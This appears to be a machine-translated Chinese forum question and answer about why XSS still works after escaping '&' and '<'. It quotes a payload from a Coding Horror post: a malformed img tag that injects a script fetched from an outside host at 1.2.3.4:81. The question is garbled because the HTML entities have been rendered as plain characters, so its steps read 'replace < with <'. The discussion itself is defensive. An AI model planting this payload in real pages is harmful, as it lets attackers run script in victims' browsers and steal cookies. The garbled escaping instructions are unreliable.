From http://www.codinghorror.com/blog/2008/08/protecting-your-cookies-httponly.html:XSS如何工作,只要我确保我全部替换为&,然后将所有<替换为<?
这是怎么发生的? XSS,当然。这一切都是从脚本添加到用户的个人资料页面开始的。
<img src=""http://www.a.com/a.jpg<script type=text/javascript src="http://1.2.3.4:81/xss.js">" /><<img src=""http://www.a.com/a.jpg</script>"
确定这片段上方,他说的是更换所有<
到<
所以基本上,如果用户写的东西像
<img src=""http://www.a.com/a.jpg<script type=text/javascript
src="http://1.2.3.4:81/xss.js">" /><<img
src=""http://www.a.com/a.jpg</script>
我不明白为什么它能够XSS的如果我们只是搜索字符&
并将其替换为&
,那么请搜索<
并将其替换为<
那它取决于场景。说清洁“,>和<就足够了并不总是正确的,例如,如果你允许用户输入一个属性值不包含引号,那么你就有麻烦了。虽然我们应该总是用属性引用,但设计师可能会不理解这些东西,还有一些其他问题涉及将用户输入放入锚标签的href属性中,如果用HTML实体替换所有的东西,那么它就更加安全和丑陋。 – Tower